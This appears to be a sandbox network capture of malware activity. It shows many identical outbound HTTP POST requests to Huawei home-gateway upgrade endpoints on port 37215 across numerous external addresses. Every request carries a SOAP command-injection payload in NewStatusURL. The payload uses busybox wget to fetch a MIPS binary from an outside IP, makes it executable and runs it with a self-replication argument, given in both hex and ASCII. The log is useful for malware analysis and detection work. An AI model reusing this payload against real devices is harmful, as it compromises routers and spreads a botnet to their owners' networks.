                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1361192.168.2.1335854197.70.102.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.459038973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1362192.168.2.134590841.208.185.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.480398893 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1363192.168.2.1334000157.100.88.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.480423927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1364192.168.2.1356284197.118.85.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.480438948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1365192.168.2.1354404129.13.112.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.480443954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1366192.168.2.1350532157.212.131.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.480449915 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1367192.168.2.135396090.111.120.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.480460882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1368192.168.2.1356518197.125.86.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.480516911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1369192.168.2.1338200157.78.146.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.480601072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1370192.168.2.1350278180.26.102.2637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.480604887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 